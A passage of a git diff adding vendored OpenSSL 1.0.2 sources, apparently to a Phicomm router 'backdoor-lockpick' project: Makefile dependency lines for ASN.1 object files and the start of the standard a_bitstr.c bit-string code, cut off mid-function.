+t_req.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+t_req.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+t_req.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+t_req.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+t_req.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+t_req.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+t_req.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_req.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+t_req.o: ../../include/openssl/x509v3.h ../cryptlib.h t_req.c
+t_spki.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_spki.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_spki.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+t_spki.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+t_spki.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+t_spki.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+t_spki.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+t_spki.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+t_spki.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+t_spki.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+t_spki.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+t_spki.o: ../../include/openssl/x509_vfy.h ../cryptlib.h t_spki.c
+t_x509.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_x509.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_x509.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+t_x509.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+t_x509.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+t_x509.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+t_x509.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+t_x509.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+t_x509.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+t_x509.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+t_x509.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_x509.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+t_x509.o: ../../include/openssl/x509v3.h ../cryptlib.h asn1_locl.h t_x509.c
+t_x509a.o: ../../e_os.h ../../include/openssl/asn1.h
+t_x509a.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+t_x509a.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+t_x509a.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+t_x509a.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+t_x509a.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+t_x509a.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+t_x509a.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+t_x509a.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+t_x509a.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+t_x509a.o: ../../include/openssl/x509_vfy.h ../cryptlib.h t_x509a.c
+tasn_dec.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_dec.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tasn_dec.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tasn_dec.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+tasn_dec.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+tasn_dec.o: ../../include/openssl/opensslconf.h
+tasn_dec.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_dec.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_dec.o: ../../include/openssl/symhacks.h tasn_dec.c
+tasn_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+tasn_enc.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+tasn_enc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+tasn_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+tasn_enc.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_enc.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_enc.o: ../../include/openssl/symhacks.h ../cryptlib.h tasn_enc.c
+tasn_fre.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_fre.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_fre.o: ../../include/openssl/e_os2.h ../../include/openssl/obj_mac.h
+tasn_fre.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_fre.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_fre.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_fre.o: ../../include/openssl/symhacks.h tasn_fre.c
+tasn_new.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_new.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_new.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+tasn_new.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_new.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_new.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_new.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_new.o: ../../include/openssl/symhacks.h tasn_new.c
+tasn_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+tasn_prn.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+tasn_prn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+tasn_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tasn_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tasn_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_prn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tasn_prn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tasn_prn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tasn_prn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+tasn_prn.o: ../cryptlib.h asn1_locl.h tasn_prn.c
+tasn_typ.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_typ.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_typ.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+tasn_typ.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_typ.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_typ.o: ../../include/openssl/symhacks.h tasn_typ.c
+tasn_utl.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_utl.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_utl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+tasn_utl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_utl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_utl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_utl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_utl.o: ../../include/openssl/symhacks.h tasn_utl.c
+x_algor.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+x_algor.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x_algor.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_algor.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_algor.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_algor.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_algor.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_algor.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_algor.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_algor.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_algor.o: x_algor.c
+x_attrib.o: ../../e_os.h ../../include/openssl/asn1.h
+x_attrib.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_attrib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_attrib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_attrib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_attrib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_attrib.o: ../../include/openssl/opensslconf.h
+x_attrib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_attrib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x_attrib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x_attrib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x_attrib.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x_attrib.c
+x_bignum.o: ../../e_os.h ../../include/openssl/asn1.h
+x_bignum.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_bignum.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+x_bignum.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_bignum.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+x_bignum.o: ../../include/openssl/opensslconf.h
+x_bignum.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_bignum.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+x_bignum.o: ../../include/openssl/symhacks.h ../cryptlib.h x_bignum.c
+x_crl.o: ../../e_os.h ../../include/openssl/asn1.h
+x_crl.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_crl.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+x_crl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_crl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x_crl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x_crl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x_crl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_crl.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x_crl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x_crl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x_crl.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x_crl.o: ../cryptlib.h asn1_locl.h x_crl.c
+x_exten.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+x_exten.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x_exten.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_exten.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_exten.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_exten.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_exten.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_exten.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_exten.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_exten.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_exten.o: x_exten.c
+x_info.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+x_info.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_info.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_info.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_info.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_info.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_info.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_info.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_info.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_info.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_info.o: ../cryptlib.h x_info.c
+x_long.o: ../../e_os.h ../../include/openssl/asn1.h
+x_long.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_long.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+x_long.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_long.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+x_long.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_long.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+x_long.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_long.o: ../cryptlib.h x_long.c
+x_name.o: ../../e_os.h ../../include/openssl/asn1.h
+x_name.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_name.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_name.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_name.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_name.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_name.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_name.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_name.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_name.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_name.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_name.o: ../cryptlib.h asn1_locl.h x_name.c
+x_nx509.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+x_nx509.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x_nx509.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_nx509.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_nx509.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_nx509.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_nx509.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_nx509.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_nx509.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_nx509.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_nx509.o: x_nx509.c
+x_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+x_pkey.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+x_pkey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_pkey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_pkey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_pkey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_pkey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_pkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_pkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_pkey.o: ../cryptlib.h x_pkey.c
+x_pubkey.o: ../../e_os.h ../../include/openssl/asn1.h
+x_pubkey.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_pubkey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_pubkey.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+x_pubkey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x_pubkey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x_pubkey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x_pubkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_pubkey.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+x_pubkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_pubkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_pubkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_pubkey.o: ../cryptlib.h asn1_locl.h x_pubkey.c
+x_req.o: ../../e_os.h ../../include/openssl/asn1.h
+x_req.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_req.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_req.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_req.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_req.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_req.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_req.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_req.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_req.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_req.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_req.o: ../cryptlib.h x_req.c
+x_sig.o: ../../e_os.h ../../include/openssl/asn1.h
+x_sig.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_sig.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_sig.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_sig.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_sig.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_sig.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_sig.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_sig.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_sig.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_sig.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_sig.o: ../cryptlib.h x_sig.c
+x_spki.o: ../../e_os.h ../../include/openssl/asn1.h
+x_spki.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_spki.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_spki.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_spki.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_spki.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_spki.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_spki.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_spki.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_spki.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_spki.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_spki.o: ../cryptlib.h x_spki.c
+x_val.o: ../../e_os.h ../../include/openssl/asn1.h
+x_val.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_val.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_val.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_val.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_val.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_val.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_val.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_val.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_val.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_val.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_val.o: ../cryptlib.h x_val.c
+x_x509.o: ../../e_os.h ../../include/openssl/asn1.h
+x_x509.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_x509.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+x_x509.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_x509.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x_x509.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x_x509.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x_x509.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_x509.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x_x509.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x_x509.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x_x509.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x_x509.o: ../cryptlib.h x_x509.c
+x_x509a.o: ../../e_os.h ../../include/openssl/asn1.h
+x_x509a.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_x509a.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_x509a.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_x509a.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_x509a.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_x509a.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_x509a.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_x509a.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_x509a.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_x509a.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_x509a.o: ../cryptlib.h x_x509a.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bitstr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bitstr.c
new file mode 100644
index 0000000..f906188
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bitstr.c
@@ -0,0 +1,262 @@
+/* crypto/asn1/a_bitstr.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+
+int ASN1_BIT_STRING_set(ASN1_BIT_STRING *x, unsigned char *d, int len)
+{
+    return M_ASN1_BIT_STRING_set(x, d, len);
+}
+
+int i2c_ASN1_BIT_STRING(ASN1_BIT_STRING *a, unsigned char **pp)
+{
+    int ret, j, bits, len;
+    unsigned char *p, *d;
+
+    if (a == NULL)
+        return (0);
+
+    len = a->length;
+
+    if (len > 0) {
+        if (a->flags & ASN1_STRING_FLAG_BITS_LEFT) {
+            bits = (int)a->flags & 0x07;
+        } else {
+            for (; len > 0; len--) {
+                if (a->data[len - 1])
+                    break;
+            }
+            j = a->data[len - 1];
+            if (j & 0x01)
+                bits = 0;
+            else if (j & 0x02)
+                bits = 1;
+            else if (j & 0x04)
+                bits = 2;
+            else if (j & 0x08)
+                bits = 3;
+            else if (j & 0x10)
+                bits = 4;
+            else if (j & 0x20)
+                bits = 5;
+            else if (j & 0x40)
+                bits = 6;
+            else if (j & 0x80)
+                bits = 7;
+            else
+                bits = 0;       /* should not happen */
+        }
+    } else
+        bits = 0;
+
+    ret = 1 + len;
+    if (pp == NULL)
+        return (ret);
+
+    p = *pp;
+
+    *(p++) = (unsigned char)bits;
+    d = a->data;
+    memcpy(p, d, len);
+    p += len;
+    if (len > 0)
+        p[-1] &= (0xff << bits);
+    *pp = p;
+    return (ret);
+}
+
+ASN1_BIT_STRING *c2i_ASN1_BIT_STRING(ASN1_BIT_STRING **a,
+                                     const unsigned char **pp, long len)
+{
+    ASN1_BIT_STRING *ret = NULL;
+    const unsigned char *p;
+    unsigned char *s;
+    int i;
+
+    if (len < 1) {
+        i = ASN1_R_STRING_TOO_SHORT;
+        goto err;
+    }
+
+    if ((a == NULL) || ((*a) == NULL)) {
+        if ((ret = M_ASN1_BIT_STRING_new()) == NULL)
+            return (NULL);
+    } else
+        ret = (*a);
+
+    p = *pp;
+    i = *(p++);
+    if (i > 7) {
+        i = ASN1_R_INVALID_BIT_STRING_BITS_LEFT;
+        goto err;
+    }
+    /*
+     * We do this to preserve the settings.  If we modify the settings, via
+     * the _set_bit function, we will recalculate on output
+     */
+    ret->flags &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07); /* clear */
+    ret->flags |= (ASN1_STRING_FLAG_BITS_LEFT | i); /* set */
+
+    if (len-- > 1) {            /* using one because of the bits left byte */
+        s = (unsigned char *)OPENSSL_malloc((int)len);
+        if (s == NULL) {
+            i = ERR_R_MALLOC_FAILURE;
+            goto err;
+        }
+        memcpy(s, p, (int)len);
+        s[len - 1] &= (0xff << i);
+        p += len;
+    } else
+        s = NULL;
+
+    ret->length = (int)len;
+    if (ret->data != NULL)
+        OPENSSL_free(ret->data);
+    ret->data = s;
+    ret->type = V_ASN1_BIT_STRING;
+    if (a != NULL)
+        (*a) = ret;
+    *pp = p;
+    return (ret);
+ err:
+    ASN1err(ASN1_F_C2I_ASN1_BIT_STRING, i);
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        M_ASN1_BIT_STRING_free(ret);
+    return (NULL);
+}
+
+/*
+ * These next 2 functions from Goetz Babin-Ebell <babinebell@trustcenter.de>
+ */
+int ASN1_BIT_STRING_set_bit(ASN1_BIT_STRING *a, int n, int value)
+{
+    int w, v, iv;
+    unsigned char *c;
+
+    w = n / 8;
+    v = 1 << (7 - (n & 0x07));
+    iv = ~v;
+    if (!value)
+        v = 0;
+
+    if (a == NULL)
+        return 0;
+
+    a->flags &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07); /* clear, set on write */
+
+    if ((a->length < (w + 1)) || (a->data == NULL)) {
+        if (!value)
+            return (1);         /* Don't need to set */
+        if (a->data == NULL)
+            c = (unsigned char *)OPENSSL_malloc(w + 1);
+        else
+            c = (unsigned char *)OPENSSL_realloc_clean(a->data,
+                                                       a->length, w + 1);
+        if (c == NULL) {
+            ASN1err(ASN1_F_ASN1_BIT_STRING_SET_BIT, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        if (w + 1 - a->length > 0)
+            memset(c + a->length, 0, w + 1 - a->length);
+        a->data = c;
+        a->length = w + 1;
+    }
+    a->data[w] = ((a->data[w]) & iv) | v;
